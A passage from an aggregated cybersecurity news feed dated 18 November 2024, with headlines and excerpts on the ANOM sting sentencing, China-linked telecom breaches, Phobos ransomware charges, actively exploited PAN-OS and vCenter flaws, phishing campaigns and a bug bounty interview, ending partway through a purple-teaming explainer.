Security News
The latest cybersecurity news, collected from various security websites.
2024-11-18 23:11:32
Security culture and its importance in protecting organizations
This article examines the importance of having a security culture in business and highlights the numerous benefits of building this type of culture.
by Barracuda
2024-11-18 22:24:12
Distributor of ANOM Encrypted Devices Sentenced to Over 5 Years in Prison
A critical player in one of the world's largest law enforcement sting operations has been sentenced to 63 months in prison. Osemah Elhassen, an Australian national residing in Colombia, admitted to participating in a global conspiracy to distribute hardened encrypted communication devices, called ANOM, to criminal organizations, facilitating large-scale drug trafficking and money laundering. This sentencing is a significant milestone in "Operation Trojan Shield," a covert international law enforcement initiative that turned the tools of criminals against them.
The Trojan Shield Sting
The operation, spearheaded by the FBI, involved secretly infiltrating and intercepting an encrypted messaging platform known as ANOM. Marketed as a secure communications tool, ANOM became popular among criminal enterprises seeking to evade law enforcement. However, what its users didn't know was that the FBI had gained backdoor access to it. Over three years, law enforcement agencies intercepted more than 27 million messages between criminal operatives worldwide. These communications provided real-time insights into drug trafficking, arms deals, and other illicit activities, resulting in the arrests of hundreds of individuals globally when the platform was dismantled in June 2021.
[Figure: ANOM encrypted device usage worldwide. (Source: FBI)]
Elhassen's Role in the ANOM Enterprise
Elhassen, one of 17 defendants indicted in the U.S. for their involvement in the scheme, pleaded guilty in May 2024 to racketeering conspiracy. Court records detail how Elhassen acted as a key distributor of ANOM devices, targeting criminal syndicates operating across the globe. His actions facilitated the importation and distribution of at least 15 kilograms of cocaine and the laundering of proceeds from illegal activities.
According to prosecutors, Elhassen joined the ANOM enterprise in November 2019. Operating out of Colombia, he actively participated in drug trafficking and money laundering while aiding the enterprise's other illegal objectives, including obstruction of justice. His distribution of ANOM devices played a pivotal role in enabling criminal organizations to coordinate illicit activities securely, or so they thought.
A Warning to Criminal Enterprises, But...
Law enforcement officials have lauded Operation Trojan Shield as a game-changer in combating organized crime. "This case demonstrates that no criminal network is beyond the reach of international cooperation," said federal prosecutors. By flipping encrypted communication tools into surveillance assets, law enforcement agencies dismantled numerous criminal enterprises that relied on the illusion of secure communications. The operation also shows the risks criminals face when placing blind trust in technology. Tools like ANOM, which were specifically designed to cater to illicit activities, ultimately became a liability for their users.
The success of Operation Trojan Shield raises broader questions about the use of encryption in facilitating crime. While encryption remains a cornerstone of cybersecurity and data privacy, its misuse for illicit purposes complicates the debate over government backdoors and the extent of law enforcement's reach into encrypted platforms. Critics argue that such operations could set a precedent for governments to exploit encryption technologies, potentially undermining the privacy and security of legitimate users. However, proponents contend that targeted operations like this demonstrate the effectiveness of using innovative methods to tackle organized crime without compromising broader encryption standards.
Elhassen's sentencing sends a clear message to those who profit from enabling criminal enterprises. By participating in the ANOM enterprise, he not only facilitated drug trafficking but also helped perpetuate an ecosystem of crime that endangered communities worldwide. While the dismantling of ANOM and the sentencing of its facilitators represent significant victories for law enforcement, the battle against encrypted criminal networks is far from over. As technology evolves, so do the tactics of criminal enterprises. The challenge for law enforcement will be to stay one step ahead, ensuring that the tools designed to protect privacy are not weaponized for harm.
Also read: U.S. Extradites and Charges Alleged Phobos Ransomware Admin
by The Cyber Express
2024-11-18 22:20:43
T-Mobile Also Hit in China-linked Telecom Network Breaches
T-Mobile has confirmed that it was hit during a recent wave of telecom network breaches attributed to a China-linked threat group. The Chinese threat group Salt Typhoon was behind earlier confirmed breaches of AT&T, Verizon and Lumen Technologies, using that access to infiltrate the U.S. court wiretap system and target the phone data of top U.S. officials, including President-elect Donald Trump, VP-elect JD Vance, top congressional and government officials, and the campaign of Vice President Kamala Harris. T-Mobile confirmed to the Wall Street Journal that it too was hit in the attacks, but said the breach had limited impact. "T-Mobile is closely monitoring this industry-wide attack, and at this time, T-Mobile systems and data have not been impacted in any significant way, and we have no evidence of impacts to customer information," T-Mobile told the Journal.
Cisco Routers Said to Be Targeted in T-Mobile, Telecom Hacks
Salt Typhoon, also known as Ghost Emperor and UNC2286, accessed U.S. telecom infrastructure through vulnerabilities that included Cisco Systems routers, the WSJ said. The paper said incident investigators suspect the hackers used artificial intelligence or machine learning to further their espionage operations. Some of the targeted networks had been breached for eight months or more in attacks that accessed "call logs, unencrypted texts and some audio from targets," the Journal said, citing unnamed sources familiar with the matter. Foreign telecom firms were also compromised in the attacks, including in countries that maintain close intelligence ties to the U.S. T-Mobile has now been breached at least nine times in the last six years, according to some counts, leading to huge legal settlements and security and compliance fines.
China a Growing Cyber Threat
In a statement last week, the FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) provided an update on their investigation into the telecom network breaches. The agencies said their ongoing investigation into the People's Republic of China (PRC) attacks on commercial telecommunications infrastructure "has revealed a broad and significant cyber espionage campaign." "Specifically, we have identified that PRC-affiliated actors have compromised networks at multiple telecommunications companies to enable the theft of customer call records data, the compromise of private communications of a limited number of individuals who are primarily involved in government or political activity, and the copying of certain information that was subject to U.S. law enforcement requests pursuant to court orders. We expect our understanding of these compromises to grow as the investigation continues." The agencies said they continue to provide technical assistance, share information to help other potential targets, "and work to strengthen cyber defenses across the commercial communications sector." China has been aggressively targeting the U.S. in disinformation campaigns and critical infrastructure compromises. At a MITRE conference last month, CISA Threat Branch Chief Mark Singer said the agency considers China to potentially be a bigger threat than Russia. "The types of incidents that we've responded to, the types of intrusions that we're seeing, this is getting more and more concerning as time goes on," Singer told conference attendees, calling the threat "a bigger risk" than Russia posed in the leadup to the Ukraine war.
by The Cyber Express
2024-11-18 22:18:00
New Stealthy BabbleLoader Malware Spotted Delivering WhiteSnake and Meduza Stealers
Cybersecurity researchers have shed light on a new stealthy malware loader called BabbleLoader that has been observed in the wild delivering information stealer families such as WhiteSnake and Meduza. BabbleLoader is an "extremely evasive loader, packed with defensive mechanisms, that is designed to bypass antivirus and sandbox environments to deliver stealers into memory," Intezer security
by The Hacker News
2024-11-18 22:16:04
WhatsApp: NSO Group Operates Pegasus Spyware for Customers
Freshly released court documents reveal new details on the controversial Israeli spyware firm's operations.
by Dark Reading
2024-11-18 22:09:52
Security Industry Association Announces SIA RISE Scholarship Awardees
by Dark Reading
2024-11-18 22:06:02
AI About-Face: 'Mantis' Turns LLM Attackers Into Prey
Experimental counter-offensive system responds to malicious AI probes with their own surreptitious prompt-injection commands.
by Dark Reading
2024-11-18 21:54:40
Kyndryl & Microsoft Unveil New Services to Advance Cyber Resilience for Customers
by Dark Reading
2024-11-18 21:29:30
How REI Strengthens Security with HackerOne's Global Security Researcher Community
REI's senior application security engineer discusses their program success, evolving goals, and the value of the security researcher community.
Q: Please introduce yourself. Tell us what you do at REI and why cybersecurity is important to REI.
A: I'm Isaiah Grigsby, a senior application security engineer. I lead our vulnerability disclosure and bug bounty programs, oversee our security tools in our CI/CD pipelines, and provide training for our developers. Cybersecurity is vital to REI because it protects customers' data and ensures a safe, reliable experience. By prioritizing security, we build trust with our community and uphold the values that define our brand. It's about creating a secure environment where our customers can confidently engage with us.
Q: What were your primary goals when REI launched your bug bounty program? And how have they evolved?
A: When we launched our bug bounty program, our primary goal was to enhance our application security strategy. We initially started with a private bug bounty program to establish a foundation for security testing. After a few months of having a successful private bug bounty program, we transitioned to a public vulnerability disclosure program, which allows us to receive and manage vulnerability reports from third-party researchers. As our program has evolved, we've also introduced a public bug bounty program, enabling us to leverage the diverse skills of a global community. This progression has been instrumental in maturing our application security efforts and building a world-class security program.
Q: Why did REI choose HackerOne to manage its program?
A: We chose HackerOne to manage our program because we wanted a trusted platform to enhance our security efforts. Key factors were HackerOne's strong reputation and expertise in connecting us with a diverse community of ethical hackers.
Q: How has HackerOne's global community of security researchers expanded your security testing capabilities?
A: HackerOne's global community of ethical hackers has broadened our security testing capabilities. We connect with a diverse group of hackers, each bringing their specialties and strengths to the table. This diversity is an essential asset because there's no one-size-fits-all approach. Some focus on specific attacks, while others excel at identifying a wide range of vulnerabilities across our assets. This variety helps us uncover potential security gaps that we might overlook otherwise. What truly sets the HackerOne community apart is their collaborative spirit and commitment to ethical hacking. They genuinely want to help organizations like ours strengthen our security, and that's invaluable.
Q: Have you had any memorable interactions with hackers to date? Favorite bugs?
A: I can't pick just one favorite interaction because I'm always fascinated by the skills and time hackers invest in learning our systems. One memorable moment was when a hacker compiled an impressive proof of concept for a vulnerability in our membership application process. Their dedication and attention to detail helped us see the issue. What I love most is seeing the creativity hackers bring to the table. Each submission highlights their unique approach and understanding of security, which keeps us on our toes and continually motivates us to enhance our defenses.
Q: What REI assets can security researchers test?
A: Hackers can test our main asset, rei.com, except for paths we have deemed out of scope in our policy. View our complete list of in-scope and out-of-scope assets.
Q: What findings is the team most interested in surfacing?
A: At REI, we focus on finding critical vulnerabilities that could affect our customers' data and overall application security. We pay close attention to issues like authentication and authorization flaws, injection vulnerabilities, and anything that could lead to data breaches. Business logic errors are also a significant concern since they can impact our operations and customer experience. By prioritizing these bugs, we aim to strengthen our security and create a safe, reliable environment for our users.
Q: What advice would you give other organizations considering working with security researchers to harden their attack surface?
A: If you're considering using ethical hackers to improve your security, here's some advice based on what we've learned. First, start by clearly defining your goals. Know what specific vulnerabilities or areas you want to focus on. When choosing a platform, look for one that connects you with skilled, ethical hackers with a good reputation and solid community feedback. Communication is key, so provide context about your assets and encourage collaboration to get the best insights. Also, be ready to act on the findings you receive. Set up a process for reviewing reports and prioritize vulnerabilities based on their potential impact so you can fix them quickly. Lastly, consider ethical hacking an ongoing part of your security strategy rather than a one-off project. This proactive mindset will help you build a more robust security framework over time.
Q: Anything to say directly to the researcher community?
A: Absolutely! Thank you to the hacker community; we appreciate your crucial role in improving our security. Your skills and insights are invaluable in helping organizations like ours spot vulnerabilities we might miss. Keep pushing boundaries and sharing your knowledge. Collaboration is essential; the more we work together, the stronger we all become. Remember, your work protects companies and safeguards users and the broader digital landscape. Keep innovating and challenging the status quo. Your efforts truly make a difference. We're excited to partner with you on this journey toward a more secure future. Thank you for your commitment to ethical hacking!
by HackerOne
2024-11-18 21:14:54
U.S. Extradites and Charges Alleged Phobos Ransomware Admin
The United States secured the extradition of a Russian national from South Korea who is allegedly the mastermind behind the notorious Phobos ransomware. Evgenii Ptitsyn, 42, is accused of administering the Phobos ransomware operation, a malware strain responsible for victimizing over 1,000 public and private entities globally. The ransomware attacks stemming from this malware strain extorted more than $16 million in ransom payments, targeting diverse sectors such as healthcare, education, critical infrastructure, and government services. Ptitsyn, a Russian national arrested in South Korea, made his first appearance in the U.S. District Court for the District of Maryland on November 4. A 13-count indictment charges him with conspiracy, wire fraud, computer hacking, and extortion.
Alleged Role in the Phobos Ransomware Scheme
The Phobos ransomware model operated as a "ransomware-as-a-service" (RaaS) platform. According to the Department of Justice (DOJ), Ptitsyn functioned as an administrator, facilitating ransomware sales, distribution, and support for affiliates. These affiliates used Phobos ransomware to infiltrate victims' networks, encrypt sensitive data, and extort payments. Each attack left a ransom note on compromised systems, demanding cryptocurrency payments in exchange for decryption keys. Affiliates were also known to escalate threats, warning victims that stolen data would be published or shared with customers and clients if the ransom wasn't paid. Ptitsyn and his co-conspirators allegedly operated a darknet platform where affiliates purchased decryption keys, paid fees, and coordinated ransomware attacks. The DOJ identified Ptitsyn's aliases as "derxan" and "zimmermanx," which he reportedly used to advertise and facilitate illicit services on underground forums.
Arrest and Extradition
The indictment and extradition were made possible through an international collaboration involving law enforcement agencies across South Korea, Europe, Japan, and the United States. The FBI's Baltimore Field Office led the investigation, supported by Europol and the Department of Defense Cyber Crime Center. Deputy Attorney General Lisa Monaco praised the multinational effort that not only led to the dismantling of Phobos ransomware networks but also the arrest of Ptitsyn. "Together with our partners across the globe, we will continue to hold cybercriminals accountable and protect innocent victims," she said. Principal Deputy Assistant Attorney General Nicole M. Argentieri called out the devastation caused by the global scale of the Phobos operation. She noted that the ransomware targeted not only corporations but also schools, hospitals, and nonprofits, demonstrating the indiscriminate nature of these attacks.
Technical Details of Phobos Ransomware
Phobos, first observed in 2019, is often deployed against small to medium-sized organizations lacking robust cybersecurity defenses. The ransomware exploits common vulnerabilities, such as stolen credentials and unpatched systems, to gain unauthorized access. Once inside, it encrypts files and appends extensions like .phobos or .adame to affected data. The RaaS model allowed affiliates to share profits with administrators like Ptitsyn, who provided operational support and decryption tools. Cryptocurrency transactions were tracked, with affiliates paying administrators for decryption keys, ensuring a steady revenue stream. Cyber threat intelligence company Cyble told The Cyber Express that they had observed the Phobos ransomware being deployed using another tactic. It was "commonly distributed through hacked Remote Desktop (RDP) connections, taking advantage of the accessibility and cost efficiency of this dissemination vector," Cyble said. One of the most prominent examples of Phobos' lasting impact was a ransomware attack on Romanian healthcare. "Motivated by financial gains, threat actors infected the Hipocrate Information System with Phobos ransomware, which then spread to over 100 hospitals and healthcare centers in Romania," Cyble stated. A joint federal advisory from February found similar exploitation of exposed RDP connections to gain initial access by the Phobos ransomware operators. The advisory added that Phobos is likely linked to several other variants including Elking, Eight, Devos, Backmydata and Faust ransomware. They were often also observed deploying the SmokeLoader malware before deploying the Phobos variant, likely for reconnaissance.
Charges and Legal Ramifications
Ptitsyn faces charges of wire fraud, conspiracy to commit computer fraud, intentional damage to protected computers, and extortion. If convicted, he could receive up to 20 years in prison for each wire fraud count and 10 years for each computer hacking offense. U.S. Attorney Erek L. Barron reiterated the government's commitment to pursuing cybercriminals, stating, "It's only a matter of time; cybercriminals will be caught and brought to justice."
Impact on Victims and Mitigation Efforts
Phobos ransomware's reach extended across various sectors, disrupting essential services and endangering sensitive data. Victims included healthcare facilities, educational institutions, and critical infrastructure operators. These attacks often forced organizations to pay ransoms to avoid prolonged downtime or public exposure of sensitive information. To counter such threats, the DOJ encourages organizations to adopt proactive cybersecurity measures, including regular backups, strong access controls, and timely software updates. Additional resources for mitigating ransomware attacks are available on StopRansomware.gov, offering guidance from the Cybersecurity and Infrastructure Security Agency (CISA).
by The Cyber Express
2024-11-18 20:43:39
Jen Easterly, CISA Director, to Step Down on Inauguration Day
Other Biden administration appointees at CISA will also submit their resignations on Jan. 20, as the cyberdefense agency prepares for President-elect Trump's new DHS director.
by Dark Reading
2024-11-18 20:42:17
Recently disclosed VMware vCenter Server bugs are actively exploited in attacks
Broadcom warns that threat actors are actively exploiting two VMware vCenter Server vulnerabilities, tracked as CVE-2024-38812 and CVE-2024-38813, in the wild. "Updated advisory to note that VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813." […]
by Security Affairs
2024-11-18 20:14:15
Critical WordPress Plug-in Flaw Exposes 4M Sites to Takeover
A vulnerability found in the Really Simple Security plug-in allows an attacker to remotely gain access to any account on an affected website, including the administrator, when 2FA is enabled.
by Dark Reading
2024-11-18 19:57:39
Facebook Malvertising Campaign Spreads Malware via Fake Bitwarden
A Facebook malvertising campaign disguised as Bitwarden updates spreads malware, targeting business accounts. Users are tricked into installing…
by Hackread
2024-11-18 19:51:15
Financially Motivated Threat Actor, SilkSpecter, Targeting Black Friday Shoppers
Summary: In early October 2024, EclecticIQ analysts discovered a large-scale phishing campaign targeting e-commerce shoppers in Europe and the USA. This campaign, which capitalized on the heightened online shopping activity around Black Friday, is believed to have been orchestrated by a Chinese financially motivated threat actor, referred to as SilkSpecter. The campaign enticed victims with fake discounted...
by RH-ISAC
2024-11-18 19:49:30
Akira Ransomware Racks Up 30+ Victims in a Single Day
Of the numerous victims, at least three refused to pay the demanded ransom, with the rest seemingly in talks with the cybercriminal group.
by Dark Reading
2024-11-18 19:48:00
How to clear your Google search cache on Android (and why you should)
If you're concerned about your privacy, you should regularly clear your Google search cache on Android. Here's how to do this manually and set up auto-delete.
by ZDNET Security
2024-11-18 19:42:48
EPA Flags 300 Water Facilities in the U.S. as Vulnerable to Hackers
A report from the U.S. Environmental Protection Agency's (EPA) Office of Inspector General has revealed critical cybersecurity vulnerabilities in over 300 water facilities across the country, posing significant risks to public health and economic stability. The report highlights systemic weaknesses in reporting, preparedness, and response mechanisms, leaving drinking water systems susceptible to cyberattacks. Investigation highlights …
by Cyber Insider
2024-11-18 19:36:32
Facebook Ads Target Bitwarden Users with Malicious Chrome Extension
Bitdefender Labs has uncovered a malicious advertising campaign exploiting Facebook to target Bitwarden users with fake security updates. Launched on November 3, 2024, this campaign impersonates the popular password manager to distribute a harmful browser extension. The attackers use Facebook's ad platform to deliver seemingly legitimate ads under the guise of a Bitwarden-branded security alert. …
by Cyber Insider
2024-11-18 19:30:00
The Problem of Permissions and Non-Human Identities - Why Remediating Credentials Takes Longer Than You Think
According to research from GitGuardian and CyberArk, 79% of IT decision-makers reported having experienced a secrets leak, up from 75% in the previous year's report. At the same time, the number of leaked credentials has never been higher, with over 12.7 million hardcoded credentials in public GitHub repositories alone. One of the more troubling aspects of this report is that over 90% of valid
by The Hacker News
2024-11-18 19:24:10
Brave Launches "Shred" on iOS to Erase Site-Specific Data Instantly
Brave Software has unveiled "Shred," a powerful new feature in its iOS browser (version 1.71) that allows users to delete site-specific data instantly. Designed to bolster privacy against first-party tracking, Shred provides users with a one-tap solution to erase stored data for individual websites without affecting data for other sites. This development addresses an often-overlooked …
by Cyber Insider
2024-11-18 19:12:17
Hacker Claims Breach at Ford Motor Company, Leaks Customer Data
A threat actor has claimed responsibility for breaching Ford Motor Company's internal database, exposing more than 44,000 customer records. The alleged data shared on a prominent hacking forum includes sensitive details such as customer names, physical locations, and purchased products. The breach was reportedly carried out by a group associated with the notorious hacker IntelBroker, …
by Cyber Insider
2024-11-18 18:37:30
Upstart SafePay ransomware group uses LockBit builder, claims 22 victims
Huntress researchers describe two SafePay ransomware incidents resulting in file encryption and exfiltration.
by SC Media
2024-11-18 18:24:29
Industry Moves for the week of November 18, 2024 - SecurityWeek
Explore industry moves and significant changes in the industry for the week of November 18, 2024. Stay updated with the latest industry trends and shifts.
by SecurityWeek
2024-11-18 18:24:25
VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw
The saga of VMware's critical CVE-2024-38812 vCenter Server bug has reached the "exploitation detected" stage.
by SecurityWeek
2024-11-18 18:00:00
To Map Shadow IT, Follow Citizen Developers
The tangle of user-built tools is formidable to manage, but it can lead to a greater understanding of real-world business needs.
by Dark Reading
2024-11-18 17:53:07
🐝 Hive Five 198 - Do Hard Things
Fresh from the Colorado mountains 🏔️ From a LAN-party optimized house to AI-driven data patterns, PHP security hardening & bug bounty success stories. Plus NeovimConf returns & Anthropic is hiring!
by Hive Five
2024-11-18 17:51:56
US Government Agencies Impersonated in Aggressive DocuSign Phishing Scams
DocuSign phishing scams surged by 98%, with hundreds of daily attacks impersonating US government agencies like HHS and…
by Hackread
2024-11-18 17:41:45
KubeCon 2024: Innovations and Milestones Shape Future of Cloud-Native Tech
KubeCon + CloudNativeCon North America 2024 celebrated Kubernetes' 10th anniversary with major announcements, cloud-native certifications, and key updates from CNCF graduated projects.
by ITPro Today
2024-11-18 17:40:09
Brave on iOS adds new "Shred" button to wipe site-specific data
Brave Browser 1.71 for iOS introduces a new privacy-focused feature called "Shred," which allows users to easily delete site-specific mobile browsing data. [...]
by BleepingComputer
2024-11-18 17:11:38
Palo Alto Networks Patches Critical Zero-Day Firewall Bug
The security vendor's Expedition firewall appliance's PAN-OS interface tool has racked up four critical security vulnerabilities under active attack in November, leading it to advise customers to update immediately and take the devices off the Internet.
by Dark Reading
2024-11-18 17:06:00
THN Recap: Top Cybersecurity Threats, Tools, and Practices (Nov 11 - Nov 17)
What do hijacked websites, fake job offers, and sneaky ransomware have in common? They're proof that cybercriminals are finding smarter, sneakier ways to exploit both systems and people. This week makes one thing clear: no system, no person, no organization is truly off-limits. Attackers are getting smarter, faster, and more creative, using everything from human trust to hidden flaws in
by The Hacker News
2024-11-18 16:57:22
Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited
An alarming set of chained vulnerabilities in Palo Alto Networks' PAN-OS software has sparked concerns that attackers could seize administrator privileges through an authentication bypass. The first vulnerability, identified as CVE-2024-0012, is a flaw that allows unauthenticated users with network access to the management interface to escalate their privileges, tamper with configurations, or exploit other privilege escalation vulnerabilities, including the second bug, CVE-2024-9474. CVE-2024-9474 is a critical part of the exploit operation, potentially contributing to a chained attack scenario. While Palo Alto Networks has acknowledged the CVE, it has not yet provided in-depth technical details about the vulnerability's mechanics, leaving room for speculation. Palo Alto Networks has confirmed the availability of patches to address these issues and said it is "tracking a limited set of exploitation activity" and is "working with external researchers, partners, and customers to share information transparently and rapidly."
The Scope of the Threat to PAN-OS
Palo Alto Networks disclosed that the main vulnerability in the exploit chain, CVE-2024-0012, affects PAN-OS versions 10.2, 11.0, 11.1, and 11.2. Notably, Cloud NGFW and Prisma Access remain unaffected. The exploitation risk significantly decreases when organizations limit access to the management interface to trusted internal IP addresses as per best practices. Despite these measures, Palo Alto Networks Unit 42 researchers have identified limited exploitation attempts. Dubbed "Operation Lunar Peek," these attacks involve adversaries executing commands interactively and deploying malware, including webshells, on compromised firewalls.
Also read: Palo Alto Networks Warns Customers of Actively-Exploited PAN-OS vulnerability
PAN-OS Attack Origins and Indicators
Threat actors have primarily targeted exposed management web interfaces using IP addresses linked to anonymous VPN services. Palo Alto Networks has published a detailed list of suspicious IPs and associated indicators of compromise (IOCs), enabling organizations to monitor and mitigate potential threats. The list includes IPs such as 91.208.197[.]167 and 136.144.17[.]146, among others. Some post-exploitation payloads, including a PHP webshell (SHA256 hash: 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668), have also been detected.
Patching Reduces Risk
Palo Alto Networks has released patches to address CVE-2024-0012 and CVE-2024-9474 and strongly recommends updating affected devices immediately. Organizations should ensure the management interface is accessible only from trusted internal IPs to block unauthorized external access. For organizations needing further assistance, Palo Alto Networks provides support services. Unit 42 retainer customers can directly contact the threat intelligence team for incident response guidance.
Mitigations Beyond Patching
Securing the management interface is essential. Palo Alto Networks advises implementing its best practice deployment guidelines, which include restricting access to trusted internal IP addresses, avoiding direct exposure of the management interface to the internet, and continuously monitoring for IOCs using threat intelligence feeds. Palo Alto Networks has shared intelligence with the Cyber Threat Alliance (CTA) to strengthen collective defense measures against this exploit. CTA members have leveraged this data to deploy protections and disrupt threat actors systematically. Organizations should act promptly to apply patches, implement network segmentation, and adopt recommended security configurations. For ongoing updates and technical details, refer to the Palo Alto Networks Security Advisory. Ensure your defenses remain robust as attackers evolve their tactics.
by The Cyber Express
2024-11-18 16:53:19
An air fryer, a ring, and a vacuum get brought into a home. What they take out is your data (Lock and Code S05E24)This week on the Lock and Code podcast, we tell three stories about air fryers, smart rings, and vacuums that want your data.
by Malwarebytes Labs
2024-11-18 16:45:00
Gmail's New Shielded Email Feature Lets Users Create Aliases for Email PrivacyGoogle appears to be readying a new feature called Shielded Email that allows users to create email aliases when signing up for online services and better combat spam. The feature was first reported by Android Authority last week following a teardown of the latest version of Google Play Services for Android. The idea is to create unique, single-use email addresses that forward the messages to
by The Hacker News
2024-11-18 16:45:00
Beyond Compliance: The Advantage of Year-Round Network Pen TestingIT leaders know the drill—regulators and cyber insurers demand regular network penetration testing to keep the bad guys out. But here’s the thing: hackers don’t wait around for compliance schedules. Most companies approach network penetration testing on a set schedule, with the most common frequency being twice a year (29%), followed by three to four times per year (23%) and once per year (20%),
by The Hacker News
2024-11-18 16:26:00
Fake Discount Sites Exploit Black Friday to Hijack Shopper InformationA new phishing campaign is targeting e-commerce shoppers in Europe and the United States with bogus pages that mimic legitimate brands with the goal of stealing their personal information ahead of the Black Friday shopping season. ""The campaign leveraged the heightened online shopping activity in November, the peak season for Black Friday discounts. The threat actor used fake discounted products
by The Hacker News
2024-11-18 16:20:00
Chinese hackers exploit Fortinet VPN zero-day to steal credentials
Chinese threat actors use a custom post-exploitation toolkit named 'DeepData' to exploit a zero-day vulnerability in Fortinet's FortiClient Windows VPN client and steal credentials. [...]
by BleepingComputer
2024-11-18 16:10:10
CISA Director Jen Easterly to depart agency on January 20
CISA's director will depart the agency after three years at the helm, as part of the "seamless transition" of government power. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-11-18 16:00:47
QuickBooks popup scam still being delivered via Google adsWhen trying to download QuickBooks via a Google search, users may visit the wrong site and get an installer containing malware.
by Malwarebytes Labs
2024-11-18 16:00:00
The Detection Engineering ProcessThis webcast was originally published on November 8, 2024. In this video, Hayden Covington discusses the detection engineering process and how to apply the scientific method to improve the quality […] The post The Detection Engineering Process appeared first on Black Hills Information Security.
by Black Hills Information Security
2024-11-18 15:59:42
US space tech giant Maxar discloses employee data breachHackers breached U.S. satellite maker Maxar Space Systems and accessed personal data belonging to its employees, the company informs in a notification to impacted individuals. [...]
by BleepingComputer
2024-11-18 15:55:52
AI training software firm iLearningEngines says it lost $250,000 in recent cyberattack
The US-based firm said hackers misdirected a $250,000 wire transfer payment that it hasn't been able to recover. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-11-18 15:50:32
Palo Alto Networks patches two firewall zero-days used in attacksPalo Alto Networks has finally released security updates for an actively exploited zero-day vulnerability in its Next-Generation Firewalls (NGFW). [...]
by BleepingComputer
2024-11-18 15:48:08
Palo Alto sounds alarm over PAN-OS zero-day attacksPalo Alto Networks says that customer devices could be under threat from an actively-targeted critical security flaw
by SC Media
2024-11-18 15:46:22
One in five DocuSign spoofs targeting businesses found to be impersonations of regulatory agenciesSpoofs from government agencies target businesses that regularly run DocuSign transactions with U.S. state, municipal and licensing authorities.
by SC Media
2024-11-18 15:30:29
Why Custom IOCs Are Necessary for Advanced Threat Hunting and Detection
The ability to internalize and operationalize customized threat intelligence as part of a holistic security system is no longer a luxury; it's a necessity. The post Why Custom IOCs Are Necessary for Advanced Threat Hunting and Detection appeared first on SecurityWeek.
by SecurityWeek
2024-11-18 15:28:42
Attackers are exploiting 2 zero-days in Palo Alto Networks firewalls (CVE-2024-0012, CVE-2024-9474)Palo Alto Networks has released fixes for two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in its next-generation firewalls that have been exploited by attackers as zero-days. About the vulnerabilities (CVE-2024-0012, CVE-2024-9474) CVE-2024-0012 stems from missing authentication for a critical function and allows unauthenticated attackers with network access to the management web interface “to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474,” according to Palo … More → The post Attackers are exploiting 2 zero-days in Palo Alto Networks firewalls (CVE-2024-0012, CVE-2024-9474) appeared first on Help Net Security.
by Help Net Security
2024-11-18 15:19:03
Major security audit of critical FreeBSD components now availableThe FreeBSD Foundation, in partnership with the Alpha-Omega Project, has released the results of an extensive security audit of two critical FreeBSD components: the bhyve hypervisor and the Capsicum sandboxing framework. The audit, conducted by the offensive security firm Synacktiv, provides insights into potential vulnerabilities and highlights the importance of proactive security measures in open-source software. The security audit, carried out in June and July 2024, aimed to identify vulnerabilities in these subsystems’ user-mode and … More → The post Major security audit of critical FreeBSD components now available appeared first on Help Net Security.
by Help Net Security
2024-11-18 15:00:00
Why the Demand for Cybersecurity Innovation Is SurgingCompanies that recognize current market opportunities — from the need to safely implement revolutionary technology like AI to the vast proliferation of cyber threats — have remarkable growth prospects.
by Dark Reading
2024-11-18 14:51:18
Foreign adversary hacked email communications, the Library of Congress says
The Library of Congress has disclosed the compromise of some of its IT systems: an alleged foreign threat actor hacked its emails. The Library of Congress informed lawmakers about a security breach in which an alleged foreign adversary compromised some of its IT systems and gained access to email communications between congressional offices and some library staff, including […]
by Security Affairs
2024-11-18 14:47:16
US charges Phobos ransomware admin after South Korea extraditionEvgenii Ptitsyn, a Russian national and suspected administrator of the Phobos ransomware operation, was extradited from South Korea and is facing cybercrime charges in the United States. [...]
by BleepingComputer
2024-11-18 14:42:18
Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012We detail the observed limited activity regarding authentication bypass vulnerability CVE-2024-0012 affecting specific versions of PAN-OS software, and include protections and mitigations. The post Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 appeared first on Unit 42.
by Palo Alto Networks - Unit42
2024-11-18 14:39:49
Purple Team Activities: Where Offense Meets Defense to Strengthen Cyber Resilience

Purple team activities serve as a bridge between red and blue teams, combining offensive tactics with defensive strategies to enhance an organization’s overall security posture. Unlike traditional siloed approaches, purple teaming fosters collaboration between attackers (red team) and defenders (blue team) to identify weaknesses, improve detection capabilities, and refine incident response processes.

Red Team

The Red Team simulates real-world adversaries to test an organization’s defenses. Their main goal is to emulate tactics, techniques, and procedures (TTPs) that an actual attacker might use to breach systems. These activities can include penetration testing, social engineering (e.g., phishing campaigns), or advanced exploitation of vulnerabilities.
Purpose: Identify weaknesses in security posture.
Approach: Offensive and stealthy, often working under conditions that mimic those of genuine threat actors.
Outcome: A report detailing successful attack paths and vulnerabilities exploited.

Blue Team

The Blue Team is responsible for protecting the organization’s assets, monitoring for threats, and responding to attacks. They ensure that systems are fortified, continuously monitored, and resilient to threats.
Purpose: Detect, prevent, and respond to security incidents.
Approach: Defensive and proactive, focusing on incident response, patch management, and continuous monitoring.
Outcome: A strong, adaptive defense that mitigates risks identified during operations or by Red Team activities.

Purple Team

The Purple Team is a collaborative unit designed to bridge the gap between Red and Blue Teams. Rather than functioning as an independent team, they often consist of members from both sides working together. The goal is to ensure that the offensive insights of the Red Team directly enhance the defensive measures of the Blue Team.
Purpose: Facilitate learning, sharing of techniques, and improvement of security practices.
Approach: Cooperative, often using frameworks like MITRE ATT&CK to align activities and prioritize defensive enhancements.
Outcome: A continuously evolving security posture where gaps are closed faster, and defenses are enhanced by practical adversarial insights.

The Purple Team doesn’t just act as a mediator but ensures that findings from simulated attacks translate into improved detection, prevention, and response mechanisms. They also focus on training the Blue Team using Red Team tactics and fostering a culture of collaboration rather than competition.

Importance of Purple Teaming

Purple team activities integrate offensive and defensive perspectives to:
